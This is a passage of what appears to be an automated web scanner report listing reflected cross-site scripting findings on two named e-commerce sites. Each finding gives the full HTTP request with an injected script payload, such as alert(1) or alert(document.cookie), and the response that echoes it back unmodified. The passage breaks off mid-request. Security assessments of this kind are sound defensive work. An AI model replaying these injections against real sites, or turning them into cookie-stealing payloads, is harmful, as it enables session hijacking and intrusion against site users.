GET /templates/common/products/productProperties.cfm?noCache=1305468053272&buyForm3021_productId=30&buyForm3021_uniqueId=3021&buyForm3021_options=95&buyForm3021_optionValue95=733&buyForm3021_options=97&buyForm3021_optionValue97=780&buyForm3021_options=99&buyForm3021_optionValue99=852&buyForm3021_options=102&buyForm3021_optionValue102=931&buyForm3021_options=104&buyForm3021_optionValue104=993&buyForm3021_options=101&buyForm3021_optionValue101=893&buyForm3021_options=98&buyForm3021_optionValue98=814&buyForm3021_options=89&buyForm3021_optionValue89=534&buyForm3021_options=92&buyForm3021_optionValue92=646&buyForm3021_options=91&buyForm3021_optionValue91=620&buyForm3021_options=103&buyForm3021_optionValue103=960&buyForm3021_options=93&buyForm3021_optionValue93=668&buyForm3021_options=96&buyForm3021_optionValue96=743&buyForm3021_options=94&buyForm3021_optionValue94=689&buyForm3021_options=100&buyForm3021_optionValue100=867&buyForm3021_options=90&buyForm3021_optionValue90=570&buyForm3021_options=234&buyForm3021_optionValue234=4901&id=3021598c4<img%20src%3da%20onerror%3dalert(1)>01f6b76535b6cd0b HTTP/1.1
Host: www.munichmyway.com
Proxy-Connection: keep-alive
Referer: http://www.munichmyway.com/ecommerce/products/prodDetail.cfm?id=30&categoryId=93&h=733&i=780&j=852&k=931&m=993&p=893&r=814&x=534&d=646&g=620&v=960&f=668&l=743&q=689&n=867&c=570&t=4901
Origin: http://www.munichmyway.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6683804; CFTOKEN=54182995; JSESSIONID=843064d21cbd16f54bb4243f36776d517879; __utmz=99537154.1305467942.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,38927; __utma=99537154.569458606.1305467942.1305467942.1305467942.1; __utmc=99537154; __utmb=99537154.2.10.1305467942; LANGUAGEID=1

Response

HTTP/1.1 500 Element buyForm3021598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b_productId is undefined in a Java object of type class coldfusion.filter.FormScope.
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
Set-Cookie: LANGUAGEID=1;expires=Sun, 15-May-2011 15:24:33 GMT;path=/
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 14:24:32 GMT
Content-Length: 12421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Element buyForm3021598c4<img src=a onerror=alert(1)>01f6b76535b6cd0b_productId is undefined in a Java object of type class coldfusion.filter.FormScope.
</h1>
...[SNIP]...

3.101. http://www.oscommerce-manager.com/ [8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /

Issue detail

The value of the 8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c271"><script>alert(1)</script>733e64ec1b7 was submitted in the 8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=14c271"><script>alert(1)</script>733e64ec1b7 HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:06:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: SESSf6cba6c583dc3db17176d16b553730b0=2cea122d94bc5afbf815bd1b713f57b3; expires=Tue, 07-Jun-2011 17:40:11 GMT; path=/; domain=.oscommerce-manager.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:06:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 45642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed053e3a864d=14c271"><script>alert(1)</script>733e64ec1b7')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.102. http://www.oscommerce-manager.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b64d"><script>alert(1)</script>d053e3a864d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8b64d"><script>alert(1)</script>d053e3a864d=1 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:57:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: SESSf6cba6c583dc3db17176d16b553730b0=9c2dfa33debdfc269ad620e56cc549c6; expires=Tue, 07-Jun-2011 17:30:28 GMT; path=/; domain=.oscommerce-manager.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:57:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 44952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/?8b64d"><script>alert(1)</script>d053e3a864d=1')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.103. http://www.oscommerce-manager.com/PAGE-70.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /PAGE-70.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19855"><script>alert(1)</script>f81842b4bda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /PAGE-70.html19855"><script>alert(1)</script>f81842b4bda HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=c04ce3a5b54f17cd666936561a436137; has_js=1; __utma=31844193.1399225872.1305468130.1305468130.1305468130.1; __utmb=31844193.3.10.1305468130; __utmc=31844193; __utmz=31844193.1305468130.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 15:42:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 15:42:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/PAGE-70.html19855"><script>alert(1)</script>f81842b4bda')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.104. http://www.oscommerce-manager.com/misc/drupal.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ab2"><script>alert(1)</script>c8a9382be42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc18ab2"><script>alert(1)</script>c8a9382be42/drupal.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/misc18ab2"><script>alert(1)</script>c8a9382be42/drupal.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.105. http://www.oscommerce-manager.com/misc/drupal.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec796"><script>alert(1)</script>4cd7466cee6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc/drupal.jsec796"><script>alert(1)</script>4cd7466cee6?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/misc/drupal.jsec796"><script>alert(1)</script>4cd7466cee6?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.106. http://www.oscommerce-manager.com/misc/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /misc/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c1a2"><script>alert(1)</script>0adfa5fb7d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc7c1a2"><script>alert(1)</script>0adfa5fb7d8/jquery.js?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/misc7c1a2"><script>alert(1)</script>0adfa5fb7d8/jquery.js?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.107. http://www.oscommerce-manager.com/misc/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /misc/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baba7"><script>alert(1)</script>59e7569ef6f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc/jquery.jsbaba7"><script>alert(1)</script>59e7569ef6f?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/misc/jquery.jsbaba7"><script>alert(1)</script>59e7569ef6f?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.108. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/aggregator.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b6a"><script>alert(1)</script>5e71549a0f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modulesa7b6a"><script>alert(1)</script>5e71549a0f6/aggregator/aggregator.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modulesa7b6a"><script>alert(1)</script>5e71549a0f6/aggregator/aggregator.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.109. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/aggregator.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3277"><script>alert(1)</script>b21edc70c0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/aggregatord3277"><script>alert(1)</script>b21edc70c0e/aggregator.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/aggregatord3277"><script>alert(1)</script>b21edc70c0e/aggregator.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.110. http://www.oscommerce-manager.com/modules/aggregator/aggregator.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/aggregator.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed16"><script>alert(1)</script>f7f860cf0a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/aggregator/aggregator.css6ed16"><script>alert(1)</script>f7f860cf0a9?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/aggregator/aggregator.css6ed16"><script>alert(1)</script>f7f860cf0a9?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.111. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/style/customer_testimonials.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57413"><script>alert(1)</script>61f1851e1b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules57413"><script>alert(1)</script>61f1851e1b1/aggregator/style/customer_testimonials.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules57413"><script>alert(1)</script>61f1851e1b1/aggregator/style/customer_testimonials.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.112. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/style/customer_testimonials.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68db8"><script>alert(1)</script>45158dab790 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/aggregator68db8"><script>alert(1)</script>45158dab790/style/customer_testimonials.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/aggregator68db8"><script>alert(1)</script>45158dab790/style/customer_testimonials.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.113. http://www.oscommerce-manager.com/modules/aggregator/style/customer_testimonials.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/aggregator/style/customer_testimonials.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995f5"><script>alert(1)</script>a0c6474d956 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/aggregator/style995f5"><script>alert(1)</script>a0c6474d956/customer_testimonials.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
